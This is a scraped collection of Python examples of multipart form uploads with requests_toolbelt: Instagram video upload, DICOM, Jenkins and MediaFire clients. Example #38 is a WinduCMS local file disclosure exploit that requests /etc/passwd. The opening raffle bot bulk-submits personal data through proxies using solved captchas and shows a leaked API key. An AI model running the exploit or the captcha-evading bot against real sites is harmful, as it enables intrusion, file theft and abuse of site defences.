                    url = 'https://www.statuto18.com/DunkHighMaizeBlue'

                    res = requests.get(url, proxies=proxies, headers=headers1)
                    soup = BeautifulSoup(res.text, 'html.parser')

                    day = soup.select_one(
                        'input.form-control:nth-child(3)').get('name')
                    month = soup.select_one(
                        'input.form-control:nth-child(4)').get('name')
                    year = soup.select_one(
                        'input.form-control:nth-child(5)').get('name')
                    cf = soup.select_one(
                        'input.form-control:nth-child(9)').get('name')

                    if not day or not month or not year or not cf:
                        print("Empty field: day/month/year/cf")
                        continue

                    # solver = recaptchaV2Proxyless()
                    # solver.set_verbose(1)
                    # solver.set_key("bef80b4f70976b0452b83cddf6f9b152")
                    # solver.set_website_url(url)
                    # solver.set_website_key("6LdrtrgUAAAAAAAio3UhHrVdJUQXpP3vfbcFm3qx")
                    # g_response = solver.solve_and_return_solution()
                    # if g_response != 0:
                    #     print("g-response: " + g_response)
                    # else:
                    #     print("task finished with error " + solver.error_code)

                    while queue.empty():
                        time.sleep(0.1)
                    g_response = queue.get()
                    form_data = {
                        'nome2': row['Nome'],
                        'cognome2': row['Cognome'],
                        day: row['Giorno'],
                        month: row['Mese'],
                        year: row['Anno'],
                        'telefono2': row['Telefono'],
                        'email2': row['Mail'],
                        'email_conf2': row['Mail'],
                        cf: row['CF'],
                        'comune2': row['Comune'],
                        'provincia2': row['Provincia'],
                        'paese2': 'IT',
                        'sesso2': row['Sesso'],
                        'taglia2': row['Taglia'],
                        'check2': 'S',
                        'captcha2': 'undefined',
                        'campagna2': 'DunkHighMaizeBlue',
                        'form': 'registra',
                        'mark': 'S',
                        'cessione': 'S',
                        'g-recaptcha-response': g_response,
                        'action': 'trueins'
                    }

                    m = MultipartEncoder(
                        fields=form_data,
                        boundary='----WebKitFormBoundary' + ''.join(
                            random.sample(string.ascii_letters + string.digits,
                                          16)))

                    headers2 = {
                        "Content-Type":
                        m.content_type,
                        'Cookie':
                        'PHPSESSID=' + res.cookies.get('PHPSESSID'),
                        'User-Agent':
                        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
                    }

                    # print(form_data)

                    r = session.post(url,
                                     data=m,
                                     headers=headers2,
                                     proxies=proxies)

                    soup = BeautifulSoup(r.text, 'lxml')
                    thank = soup.find("div", id="content-thankyou")
                    if thank is None:
                        print(row['Mail'], "not accepted")
                        text_file = open("ST1.txt", "a")
                        text_file.write(row['Cognome'])
                        text_file.write('\n')
                        text_file.close()
                    else:
                        print(row['Mail'], "ACCEPTED")
            except Exception as e:
                print("_______ something went wrong _________", e)
Пример #29
0
def upload_video(self, video, thumbnail, caption=None, upload_id=None):
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    data = {
        'upload_id': upload_id,
        '_csrftoken': self.token,
        'media_type': '2',
        '_uuid': self.uuid,
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({'X-IG-Capabilities': '3Q4=',
                                 'X-IG-Connection-Type': 'WIFI',
                                 'Host': 'i.instagram.com',
                                 'Cookie2': '$Version=1',
                                 'Accept-Language': 'en-US',
                                 'Accept-Encoding': 'gzip, deflate',
                                 'Content-type': m.content_type,
                                 'Connection': 'keep-alive',
                                 'User-Agent': self.user_agent})
    response = self.session.post(config.API_URL + "upload/video/", data=m.to_string())
    if response.status_code == 200:
        body = json.loads(response.text)
        upload_url = body['video_upload_urls'][3]['url']
        upload_job = body['video_upload_urls'][3]['job']

        with open(video, 'rb') as video_bytes:
            video_data = video_bytes.read()
        # solve issue #85 TypeError: slice indices must be integers or None or have an __index__ method
        request_size = len(video_data) // 4
        last_request_extra = len(video_data) - 3 * request_size

        headers = copy.deepcopy(self.session.headers)
        self.session.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': 'application/octet-stream',
            'Session-ID': upload_id,
            'Connection': 'keep-alive',
            'Content-Disposition': 'attachment; filename="video.mov"',
            'job': upload_job,
            'Host': 'upload.instagram.com',
            'User-Agent': self.user_agent
        })
        for i in range(4):
            start = i * request_size
            if i == 3:
                end = i * request_size + last_request_extra
            else:
                end = (i + 1) * request_size
            length = last_request_extra if i == 3 else request_size
            content_range = "bytes {start}-{end}/{len_video}".format(
                start=start, end=end - 1, len_video=len(video_data)).encode('utf-8')

            self.session.headers.update({'Content-Length': str(end - start), 'Content-Range': content_range})
            response = self.session.post(upload_url, data=video_data[start:start + length])
        self.session.headers = headers

        if response.status_code == 200:
            if self.configure_video(upload_id, video, thumbnail, caption):
                self.expose()
                return True
    return False
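The four-part split above (three equal chunks plus a remainder chunk, each POSTed with an inclusive Content-Range) is the step most prone to off-by-one mistakes, so here is a standalone sketch of the same arithmetic that only prints the ranges; it is an illustration, not code from the client.

def chunk_ranges(total_size, parts=4):
    # Same scheme as above: equal chunks, the last one absorbs the remainder,
    # and the advertised byte range is inclusive (e.g. "bytes 0-249/1003").
    request_size = total_size // parts
    last_extra = total_size - (parts - 1) * request_size
    for i in range(parts):
        start = i * request_size
        length = last_extra if i == parts - 1 else request_size
        yield start, length, "bytes {}-{}/{}".format(start, start + length - 1, total_size)

for start, length, content_range in chunk_ranges(1003):
    print(start, length, content_range)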
Пример #30
0
def upload_study_me(file_path, model_type, host, port, output_folder, attachments):
    file_dict = []
    headers = {'Content-Type': 'multipart/related; '}
    
    images = load_image_data(file_path)
    images = sort_images(images)

    if model_type == BOUNDING_BOX:
        print("Performing bounding box prediction")
        inference_command = 'get-bounding-box-2d'
    elif model_type == SEGMENTATION_MODEL:
        if images[0].position is None:
            # No spatial information available. Perform 2D segmentation
            print("Performing 2D mask segmentation")
            inference_command = 'get-probability-mask-2D'
        else:
            print("Performing 3D mask segmentation")
            inference_command = 'get-probability-mask-3D'
    else:
        inference_command = 'other'
        
    request_json = {'request': 'post', 
                    'route': '/',
                    'inference_command': inference_command}

    count = 0
    for att in attachments:
        count += 1
        field = str(count)
        fo = open(att, 'rb').read()
        filename = os.path.basename(os.path.normpath(att))
        file_dict.append((field, (filename, fo, 'application/octet-stream')))

    for image in images:
        try:
            dcm_file = pydicom.dcmread(image.path)
            count += 1
            field = str(count)
            fo = open(image.path, 'rb').read()
            filename = os.path.basename(os.path.normpath(image.path))
            file_dict.append((field, (filename, fo, 'application/dicom')))
        except:
            print('File {} is not a DICOM file'.format(image.path))
            continue
    
    print('Sending {} files...'.format(len(images)))

    file_dict.insert(0, ('request_json', ('request', json.dumps(request_json).encode('utf-8'), 'text/json')))
    
    me = MultipartEncoder(fields=file_dict)
    boundary = me.content_type.split('boundary=')[1]
    headers['Content-Type'] = headers['Content-Type'] + 'boundary="{}"'.format(boundary)

    r = requests.post('http://' + host + ':' + port + '/', data=me, headers=headers)
    
    if r.status_code != 200:
        print("Got error status code ", r.status_code)
        exit(1)

    multipart_data = decoder.MultipartDecoder.from_response(r)

    json_response = json.loads(multipart_data.parts[0].text)
    print("JSON response:", json_response)

    if model_type == SEGMENTATION_MODEL:
        mask_count = len(json_response["parts"])

        # Assert that we get one binary part for each object in 'parts'
        # The additional two multipart object are: JSON response and request:response digests
        assert mask_count == len(multipart_data.parts) - 2, \
            "The server must return one binary buffer for each object in `parts`. Got {} buffers and {} 'parts' objects" \
            .format(len(multipart_data.parts) - 2, mask_count)
        
        masks = [np.frombuffer(p.content, dtype=np.uint8) for p in multipart_data.parts[1:mask_count+1]]

        if images[0].position is None:
            # We must sort the images by their instance UID based on the order of the response:
            identifiers = [part['dicom_image']['SOPInstanceUID'] for part in json_response["parts"]]
            filtered_images = []
            for id in identifiers:
                image = next((img for img in images if img.instanceUID == id))
                filtered_images.append(image)
            test_inference_mask.generate_images_for_single_image_masks(filtered_images, masks, json_response, output_folder)
        else:
            test_inference_mask.generate_images_with_masks(images, masks, json_response, output_folder)

        print("Segmentation mask images generated in folder: {}".format(output_folder))
        print("Saving output masks to files '{}/output_masks_*.npy".format(output_folder))
        for index, mask in enumerate(masks):
            mask.tofile('{}/output_masks_{}.npy'.format(output_folder, index + 1))
    elif model_type == BOUNDING_BOX:
        boxes = json_response['bounding_boxes_2d']
        test_inference_boxes.generate_images_with_boxes(images, boxes, output_folder)

    with open(os.path.join(output_folder, 'response.json'), 'w') as outfile:
        json.dump(json_response, outfile)
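A hedged invocation of the helper above; the study path, host, port and output folder are placeholders, and SEGMENTATION_MODEL is the constant already used by the surrounding script.

upload_study_me(file_path="studies/chest_ct/",
                model_type=SEGMENTATION_MODEL,
                host="127.0.0.1",
                port="8900",
                output_folder="out",
                attachments=[])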
Пример #31
0
    def make_post_request(self, url, payload=None, params=None, files_attached=False):
        """
        Make a POST request using the provided ``url`` and ``payload``.
        The ``payload`` must be a dict that contains the request values.
        The payload dict may contain file handles (in which case the files_attached
        flag must be set to true).

        If the ``params`` are not provided, use ``default_params`` class field.
        If params are provided and the provided dict does not have ``key`` key,
        the default ``self.key`` value will be included in what's passed to
        the server via the request.

        :return: The decoded response.
        """

        def my_dumps(d):
            """
            Apply ``json.dumps()`` to the values of the dict ``d`` if they are
            not of type ``FileStream``.
            """
            for k, v in d.items():
                if not isinstance(v, (FileStream, str, bytes)):
                    d[k] = json.dumps(v)
            return d

        # Compute data, headers, params arguments for request.post,
        # leveraging the requests-toolbelt library if any files have
        # been attached.
        if files_attached:
            if params:
                payload.update(params)
            payload = my_dumps(payload)
            payload = MultipartEncoder(fields=payload)
            headers = self.json_headers.copy()
            headers['Content-Type'] = payload.content_type
            post_params = None
        else:
            if payload is not None:
                payload = json.dumps(payload)
            headers = self.json_headers
            post_params = params

        r = requests.post(
            url,
            params=post_params,
            data=payload,
            headers=headers,
            timeout=self.timeout,
            allow_redirects=False,
            verify=self.verify,
        )
        if r.status_code == 200:
            try:
                return r.json()
            except Exception as e:
                raise ConnectionError(
                    f"Request was successful, but cannot decode the response content: {e}",
                    body=r.content,
                    status_code=r.status_code,
                )
        # @see self.body for HTTP response body
        raise ConnectionError(
            f"Unexpected HTTP status code: {r.status_code}",
            body=r.text,
            status_code=r.status_code,
        )
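A usage sketch for make_post_request; the client class name, endpoint and payload keys are illustrative assumptions, not part of the API above.

client = ApiClient()  # assumed instance of the class defining make_post_request
created = client.make_post_request(
    "https://galaxy.example.org/api/libraries",      # placeholder endpoint
    payload={"name": "project data", "description": "raw reads"},
)
print(created)
# When any payload value is one of the client's FileStream objects, pass
# files_attached=True so the body is built with MultipartEncoder instead of
# json.dumps(), as the two branches above show.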
Пример #32
0
    def request(self, action, params=None, action_token_type=None,
                upload_info=None, headers=None):
        """Perform request to MediaFire API

        action -- "category/name" of method to call
        params -- dict of parameters or query string
        action_token_type -- action token to use: None, "upload", "image"
        upload_info -- in case of upload, dict of "fd" and "filename"
        headers -- additional headers to send (used for upload)

        session_token and signature generation/update is handled automatically
        """

        uri = self._build_uri(action)

        if isinstance(params, six.text_type):
            query = params
        else:
            query = self._build_query(uri, params, action_token_type)

        if headers is None:
            headers = {}

        if upload_info is None:
            # Use request body for query
            data = query
            headers['Content-Type'] = FORM_MIMETYPE
        else:
            # Use query string for query since payload is file
            uri += '?' + query

            if "filename" in upload_info:
                data = MultipartEncoder(
                    fields={'file': (
                        upload_info["filename"],
                        upload_info["fd"],
                        UPLOAD_MIMETYPE
                    )}
                )
                headers["Content-Type"] = data.content_type
            else:
                data = upload_info["fd"]
                headers["Content-Type"] = UPLOAD_MIMETYPE

        logger.debug("uri=%s query=%s",
                     uri, query if not upload_info else None)

        try:
            # bytes from now on
            url = (API_BASE + uri).encode('utf-8')
            if isinstance(data, six.text_type):
                # request's data is bytes, dict, or filehandle
                data = data.encode('utf-8')

            response = self.http.post(url, data=data,
                                      headers=headers, stream=True)
        except RequestException as ex:
            logger.exception("HTTP request failed")
            raise MediaFireConnectionError(
                "RequestException: {}".format(ex))

        return self._process_response(response)
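A hedged usage sketch for request(); `api` is an already authenticated instance of the surrounding class, and the action names follow MediaFire's category/name scheme but are used here for illustration only.

info = api.request("user/get_info")

with open("report.pdf", "rb") as fd:
    # upload_info switches the call into upload mode: the query moves into the
    # URL and the request body becomes the multipart-encoded file part.
    api.request("upload/simple",
                params={"path": "/backups"},
                action_token_type="upload",
                upload_info={"fd": fd, "filename": "report.pdf"})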
Пример #33
0
    def publish(self, doc_artifact):
        """
        Pass the doc artifact to a Jenkins job. The actions performed by
        the Jenkins job is up to the user to decide. Suggested use of the
        Jenkins upload option is to pass the artifact to Jenkins, upload it
        to a server and unpack the files so they can be served from a webpage.

        Requires the following sections in cirrus.conf:

        [doc]
        publisher = jenkins

        [jenkins]
        url = http://localhost:8080
        doc_job = default
        doc_var = archive
        arc_var = ARCNAME
        extra_vars = True

        [jenkins_docs_extra_vars]
        var1 = value
        var2 = value

        .. note:: The doc_var is the location of the archive in the Jenkins
            workspace. It must match whatever is in the section "File location"
            in the Jenkins job configuration.

        .. note:: arc_var is the variable that will be used to name the file/folder
            the archive should be unpacked to as determined by the name of the
            archive filename. I.e. package-0.0.0.tar.gz => package-0.0.0

        .. note:: extra_vars is a boolean. When True a section named
            [jenkins_docs_extra_vars] should be added to cirrus.conf containing
            any other variables necessary for the Jenkins build.
        """
        try:
            jenkins_config = self.package_conf['jenkins']
        except KeyError:
            msg = ('[jenkins] section missing from cirrus.conf. '
                   'Please see below for an example.\n'
                   '\n [jenkins]'
                   '\n url = http://localhost:8080'
                   '\n doc_job = default'
                   '\n doc_var = archive'
                   '\n arc_var = ARCNAME'
                   '\n extra_vars = True'
                   '\n '
                   '\n [jenkins_docs_extra_vars]'
                   '\n varname = value'
                   '\n varname1 = value1')
            raise RuntimeError(msg)

        filename = os.path.basename(doc_artifact)
        build_params = {
            "parameter": [{
                "name": jenkins_config['doc_var'],
                "file": "file0"
            }]
        }

        if jenkins_config.get('arc_var') is not None:
            arcname = filename.rsplit('.', 2)[0]
            build_params['parameter'].append({
                "name": jenkins_config['arc_var'],
                "value": arcname
            })

        # need to check for True as a string because ConfigParser always
        # stores values internally as strings
        if jenkins_config.get('extra_vars', 'False').lower() == 'true':
            extra_vars = self.package_conf.get('jenkins_docs_extra_vars', {})
            for k, v in extra_vars.iteritems():
                build_params['parameter'].append({"name": k, "value": v})

        payload = MultipartEncoder(
            fields={
                "file0": (filename, open(doc_artifact, 'rb'),
                          'application/x-gzip'),
                "json": json.dumps(build_params)
            })

        client = JenkinsClient(jenkins_config['url'])

        response = client.start_job_file_upload(jenkins_config['doc_job'],
                                                payload)

        if response.status_code != 201:
            LOGGER.error(response.text)
            raise RuntimeError('Jenkins HTTP API returned code {}'.format(
                response.status_code))
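For reference, a hedged sketch of the raw HTTP request the JenkinsClient call above corresponds to: Jenkins' parameterized-build endpoint accepts a multipart body whose "json" field references the attached file part by name. The URL, job name, file name and credentials are placeholders.

import json
import requests
from requests_toolbelt import MultipartEncoder

build_params = {"parameter": [{"name": "archive", "file": "file0"}]}
payload = MultipartEncoder(fields={
    "file0": ("docs.tar.gz", open("docs.tar.gz", "rb"), "application/x-gzip"),
    "json": json.dumps(build_params),
})
response = requests.post("http://localhost:8080/job/default/build",
                         data=payload,
                         headers={"Content-Type": payload.content_type},
                         auth=("user", "api-token"))
print(response.status_code)  # 201 means Jenkins queued the build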
Пример #34
0
#login_xadmin(s)
# log in first (see login_xadmin above)

url2 = "http://49.235.92.12:8020/xadmin/hello/teacherman/add/"
r3 = s.get(url2)
# print(r3.text)

token2 = re.findall("name='csrfmiddlewaretoken' value='(.+?)'", r3.text)
print(token2[0])
# multipart/form-data POST request

m = MultipartEncoder(fields=[
    ("csrfmiddlewaretoken", token2[0]),
    ("csrfmiddlewaretoken", token2[0]),
    ("teacher_name", "xx44"),
    ("tel", "xx12"),
    ("mail", "xx"),
    ("sex", "M"),
    ("_save", "xx"),
], )
r4 = s.post(url2, data=m, headers={'Content-Type': m.content_type})
print(r4.text)

from requests_toolbelt import MultipartEncoder
m = MultipartEncoder(
    fields={
        'field0': 'value',
        'field1': 'value',
        'field2': ('filename', open('file.py', 'rb'), 'text/plain')
    })
r = requests.post('http://httpbin.org/post',
                  data=m,
                  headers={'Content-Type': m.content_type})
Пример #35
0
    def upload_video(self, video, thumbnail, caption=None, upload_id=None):

        # TODO: Migrate to use _sendrequest.
        if upload_id is None:
            upload_id = str(int(time.time() * 1000))
        data = {
            'upload_id': upload_id,
            '_csrftoken': self._csrftoken,
            'media_type': '2',
            '_uuid': self._uuid,
        }
        m = MultipartEncoder(data, boundary=self._uuid)
        self._session.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Host': 'i.instagram.com',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': m.content_type,
            'Connection': 'keep-alive',
            'User-Agent': self.USER_AGENT
        })
        response = self._session.post(self.API_URL + "upload/video/",
                                      data=m.to_string())
        if response.status_code == 200:
            body = json.loads(response.text)
            upload_url = body['video_upload_urls'][3]['url']
            upload_job = body['video_upload_urls'][3]['job']

            with open(video, 'rb') as videofile:
                video_data = videofile.read()
            request_size = int(math.floor(len(video_data) / 4))
            last_request_extra = (len(video_data) - (request_size * 3))

            headers = copy.deepcopy(self._session.headers)
            self._session.headers.update({
                'X-IG-Capabilities': '3Q4=',
                'X-IG-Connection-Type': 'WIFI',
                'Cookie2': '$Version=1',
                'Accept-Language': 'en-US',
                'Accept-Encoding': 'gzip, deflate',
                'Content-type': 'application/octet-stream',
                'Session-ID': upload_id,
                'Connection': 'keep-alive',
                'Content-Disposition': 'attachment; filename="video.mov"',
                'job': upload_job,
                'Host': 'upload.instagram.com',
                'User-Agent': self.USER_AGENT
            })
            for i in range(0, 4):
                start = i * request_size
                if i == 3:
                    end = i * request_size + last_request_extra
                else:
                    end = (i + 1) * request_size
                length = last_request_extra if i == 3 else request_size
                content_range = "bytes {start}-{end}/{lenVideo}".format(
                    start=start, end=(end - 1),
                    lenVideo=len(video_data)).encode('utf-8')

                self._session.headers.update({
                    'Content-Length': str(end - start),
                    'Content-Range': content_range,
                })
                LOGGER.info("Starting to upload %d bytes of video data",
                            len(video_data))
                response = self._session.post(upload_url,
                                              data=video_data[start:start +
                                                              length])
            self._session.headers = headers

            if response.status_code == 200:
                if self.configure_video(upload_id, video, thumbnail, caption):
                    LOGGER.info("Video configuration complete. Exposing.")
                    self.expose()
                    LOGGER.info("Video upload complete.")

        return False
Пример #36
0
def postFileFunction(url, datafile, runmeta):

    f = copy.copy(runmeta)

    formsubmit = MultipartEncoder({
        'tabletest_bundle_api_upload_type[Filetable][filename]':
        f.FileName,
        'tabletest_bundle_api_upload_type[Filetable][toolid][toolname]':
        f.Toolname,
        'tabletest_bundle_api_upload_type[Filetable][seqrun]':
        '1',
        'tabletest_bundle_api_upload_type[Filetable][smpid]':
        f.BiocontrolSampId,
        'tabletest_bundle_api_upload_type[Filetable][runid]':
        f.BRunId,
        'tabletest_bundle_api_upload_type[Filetable][day]':
        str((f.SampledOn - f.InnoculatedFrom).days),
        'tabletest_bundle_api_upload_type[Filetable][gnmid][gnmname]':
        f.Genomename,
        'tabletest_bundle_api_upload_type[Filetable][glocoverage]':
        f.GloCoverage,
        'tabletest_bundle_api_upload_type[Filetable][expid]':
        f.Experiment  #Can be removed  from here.
        ,
        'tabletest_bundle_api_upload_type[RunMeta][runid]':
        f.RunId,
        'tabletest_bundle_api_upload_type[RunMeta][rundescription]':
        f.RunDescription,
        'tabletest_bundle_api_upload_type[RunMeta][runfrom][year]':
        str(f.SampledOn.year),
        'tabletest_bundle_api_upload_type[RunMeta][innoculatedfrom][month]':
        str(f.InnoculatedFrom.month),
        'tabletest_bundle_api_upload_type[RunMeta][innoculatedfrom][day]':
        str(f.InnoculatedFrom.day),
        'tabletest_bundle_api_upload_type[RunMeta][innoculatedfrom][year]':
        str(f.InnoculatedFrom.year),
        'tabletest_bundle_api_upload_type[RunMeta][runfrom][month]':
        str(f.SampledOn.month),
        'tabletest_bundle_api_upload_type[RunMeta][runfrom][day]':
        str(f.SampledOn.day),
        'tabletest_bundle_api_upload_type[RunMeta][cust]':
        f.Customer,
        'tabletest_bundle_api_upload_type[RunMeta][corpobj]':
        f.CorpObj,
        'tabletest_bundle_api_upload_type[RunMeta][createdby]':
        f.CreatedBy,
        'tabletest_bundle_api_upload_type[RunMeta][labbook]':
        f.Labbook,
        'tabletest_bundle_api_upload_type[RunMeta][task]':
        f.Task,
        'tabletest_bundle_api_upload_type[RunMeta][milestone]':
        f.Milestone,
        'tabletest_bundle_api_upload_type[RunMeta][experiment]':
        f.Experiment,
        'tabletest_bundle_api_upload_type[Filetable][uploadFile]':
        ('filename', open(datafile + '/Hansel.csv', 'r'), 'text/csv')
    })

    # exit()
    r = requests.post(url,
                      data=formsubmit,
                      headers={'Content-Type': formsubmit.content_type})
    # print(r.status_code)
    # print r.json()[u'data']
    if r.status_code == 200 and r.json()['data'] != 'Null':
        return str(r.json()['data'])
    else:
        return 'Null'
Пример #37
0
def upload_video(self, video, thumbnail, caption=None, upload_id=None):
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    data = {
        'upload_id': upload_id,
        '_csrftoken': self.token,
        'media_type': '2',
        '_uuid': self.uuid,
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({
        'X-IG-Capabilities': '3Q4=',
        'X-IG-Connection-Type': 'WIFI',
        'Host': 'i.instagram.com',
        'Cookie2': '$Version=1',
        'Accept-Language': 'en-US',
        'Accept-Encoding': 'gzip, deflate',
        'Content-type': m.content_type,
        'Connection': 'keep-alive',
        'User-Agent': config.USER_AGENT
    })
    response = self.session.post(config.API_URL + "upload/video/",
                                 data=m.to_string())
    if response.status_code == 200:
        body = json.loads(response.text)
        upload_url = body['video_upload_urls'][3]['url']
        upload_job = body['video_upload_urls'][3]['job']

        with open(video, 'rb') as video_bytes:
            video_data = video_bytes.read()
        # solve issue #85 TypeError: slice indices must be integers or None or have an __index__ method
        request_size = len(video_data) // 4
        last_request_extra = len(video_data) - 3 * request_size

        headers = copy.deepcopy(self.session.headers)
        self.session.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': 'application/octet-stream',
            'Session-ID': upload_id,
            'Connection': 'keep-alive',
            'Content-Disposition': 'attachment; filename="video.mov"',
            'job': upload_job,
            'Host': 'upload.instagram.com',
            'User-Agent': config.USER_AGENT
        })
        for i in range(4):
            start = i * request_size
            if i == 3:
                end = i * request_size + last_request_extra
            else:
                end = (i + 1) * request_size
            length = last_request_extra if i == 3 else request_size
            content_range = "bytes {start}-{end}/{len_video}".format(
                start=start, end=end - 1,
                len_video=len(video_data)).encode('utf-8')

            self.session.headers.update({
                'Content-Length': str(end - start),
                'Content-Range': content_range
            })
            response = self.session.post(upload_url,
                                         data=video_data[start:start + length])
        self.session.headers = headers

        if response.status_code == 200:
            if self.configure_video(upload_id, video, thumbnail, caption):
                self.expose()
                return True
    return False
Пример #38
0
# Vendor Homepage: http://windu.org
# Version: 3.1
# Tested on: Linux Debian 9
#
# // Description //
#   
# Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here
# 
# // PoC //
#
# It requires a contact form present on the website
#
# Example: {{W name=contactForm inputs="name" email="root@localhost"}}
#

from requests_toolbelt import MultipartEncoder
import requests

print("WinduCMS <= 3.1 Exploit")
 
url = 'http://localhost/contact_page?mn=contactform.message.negative'
email = '*****@*****.**'
payload = '<img src="/etc/passwd"'
form_input = 'name'
fields = {'form_key': 'contactForm', form_input: 'Attacker', 'email': email, 'content': payload}
m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundary1500777958139315')
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 'Content-Type': m.content_type}
print('Sending payload to target...')
r = requests.post(url, data=m.to_string(), headers=headers)
if r.status_code == 200:
	print('Exploited.')
Пример #39
0
def upload_video(self,
                 video,
                 caption=None,
                 upload_id=None,
                 thumbnail=None,
                 options={}):
    """Upload video to Instagram

    @param video      Path to video file (String)
    @param caption    Media description (String)
    @param upload_id  Unique upload_id (String). When None, then generate
                      automatically
    @param thumbnail  Path to thumbnail for video (String). When None, then
                      thumbnail is generate automatically
    @param options    Object with difference options, e.g. configure_timeout,
                      rename_thumbnail, rename (Dict)
                      Designed to reduce the number of function arguments!
                      This is the simplest request object.

    @return           Object with state of uploading to Instagram (or False)
    """
    options = dict(
        {
            "configure_timeout": 15,
            "rename_thumbnail": True,
            "rename": True
        }, **(options or {}))
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    video, thumbnail, width, height, duration = resize_video(video, thumbnail)
    data = {
        "upload_id": upload_id,
        "_csrftoken": self.token,
        "media_type": "2",
        "_uuid": self.uuid,
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({
        "X-IG-Capabilities": "3Q4=",
        "X-IG-Connection-Type": "WIFI",
        "Host": "i.instagram.com",
        "Cookie2": "$Version=1",
        "Accept-Language": "en-US",
        "Accept-Encoding": "gzip, deflate",
        "Content-type": m.content_type,
        "Connection": "keep-alive",
        "User-Agent": self.user_agent,
    })
    response = self.session.post(config.API_URL + "upload/video/",
                                 data=m.to_string())
    if response.status_code == 200:
        body = json.loads(response.text)
        upload_url = body["video_upload_urls"][3]["url"]
        upload_job = body["video_upload_urls"][3]["job"]

        with open(video, "rb") as video_bytes:
            video_data = video_bytes.read()
        # solve issue #85 TypeError:
        # slice indices must be integers or None or have an __index__ method
        request_size = len(video_data) // 4
        last_request_extra = len(video_data) - 3 * request_size

        headers = copy.deepcopy(self.session.headers)
        self.session.headers.update({
            "X-IG-Capabilities": "3Q4=",
            "X-IG-Connection-Type": "WIFI",
            "Cookie2": "$Version=1",
            "Accept-Language": "en-US",
            "Accept-Encoding": "gzip, deflate",
            "Content-type": "application/octet-stream",
            "Session-ID": upload_id,
            "Connection": "keep-alive",
            "Content-Disposition": 'attachment; filename="video.mov"',
            "job": upload_job,
            "Host": "upload.instagram.com",
            "User-Agent": self.user_agent,
        })
        for i in range(4):
            start = i * request_size
            if i == 3:
                end = i * request_size + last_request_extra
            else:
                end = (i + 1) * request_size
            length = last_request_extra if i == 3 else request_size
            content_range = "bytes {start}-{end}/{len_video}".format(
                start=start, end=end - 1,
                len_video=len(video_data)).encode("utf-8")

            self.session.headers.update({
                "Content-Length": str(end - start),
                "Content-Range": content_range
            })
            response = self.session.post(upload_url,
                                         data=video_data[start:start + length])
        self.session.headers = headers

        configure_timeout = options.get("configure_timeout")
        if response.status_code == 200:
            for attempt in range(4):
                if configure_timeout:
                    time.sleep(configure_timeout)
                if self.configure_video(
                        upload_id,
                        video,
                        thumbnail,
                        width,
                        height,
                        duration,
                        caption,
                        options=options,
                ):
                    media = self.last_json.get("media")
                    self.expose()
                    if options.get("rename"):
                        from os import rename

                        rename(video, "{}.REMOVE_ME".format(video))
                    return media
    return False
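A hypothetical call of the uploader above; `bot` is an assumed, already authenticated client instance, the paths are placeholders, and the response field named in the comment is a common Instagram field rather than something guaranteed by this code.

media = bot.upload_video("clips/demo.mp4",
                         caption="weekly demo",
                         thumbnail="clips/demo.jpg",
                         options={
                             "configure_timeout": 30,  # wait longer between configure attempts
                             "rename": False,          # keep the original file afterwards
                         })
if media:
    print("uploaded media id:", media.get("pk"))  # 'pk' is typically the media id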
Пример #40
0
                    node_colors[kegg_id] = cmap(color(dsi.data[0, n]))

            elif 'NCBI-GENE' in m.databases:
                kegg_id = m.databases['NCBI-GENE']
                if kegg_id is not None:
                    node_colors[kegg_id] = cmap(color(dsi.data[0, n]))

with open(os.path.join(_pathomx_tempdir, 'kegg-pathway-data.txt'), 'w') as tmp:
    tmp.write('#hsa\tData\n')
    for k, c in list(node_colors.items()):
        tmp.write('%s\t%s\n' % (k, c[0]))

m = MultipartEncoder(
        fields={
          'map': config['kegg_pathway_id'],
          'mapping_list': ('filename', open(os.path.join(_pathomx_tempdir, 'kegg-pathway-data.txt'), 'r')),
          'mode': 'color',
          'submit': 'Exec',
         }
)

r = requests.post(url, data=m, headers={'Content-Type': m.content_type})
html = r.text

from pathomx.displayobjects import Html  # We've got the html page; pull out the image
# <img src="/tmp/mark_pathway13818418802193/hsa05200.1.png" name="pathwayimage" usemap="#mapdata" border="0" />
m = re.search('\<img src="(.*)" name="pathwayimage"', html)
img = m.group(1)

m = re.search('^KEGG PATHWAY: (.*)$', html, flags=re.MULTILINE)
title = m.group(1)
output_html = '<html><body><img src="http://www.kegg.jp%s"></body></html>' % img
Пример #41
0
 session = requests.Session()
 try:
     setup(session)
     url = 'http://localhost:8080/api/darkshield/files/fileSearchContext.mask'
     context = json.dumps({
         "fileSearchContextName": file_search_context_name,
         "fileMaskContextName": file_mask_context_name
     })
     process_files = [('test.json', 'application/json', 'json-masked'),
                      ('test.xml', 'application/xml', 'xml-masked')]
     for file_name, media_type, masked_folder in process_files:
         with open(file_name, 'rb') as f:
             os.makedirs(masked_folder, exist_ok=True)
             encoder = MultipartEncoder(
                 fields={
                     'context': ('context', context, 'application/json'),
                     'file': (file_name, f, media_type)
                 })
             logging.info(f"POST: sending '{file_name}' to {url}")
             with session.post(
                     url,
                     data=encoder,
                     stream=True,
                     headers={'Content-Type': encoder.content_type}) as r:
                 if r.status_code >= 300:
                     raise Exception(
                         f"Failed with status {r.status_code}:\n\n{r.json()}"
                     )
                 logging.info(
                     f"Extracting '{file_name}' and 'results.json' into {masked_folder}."
                 )
Пример #42
0
    import argparse

    parser = argparse.ArgumentParser()
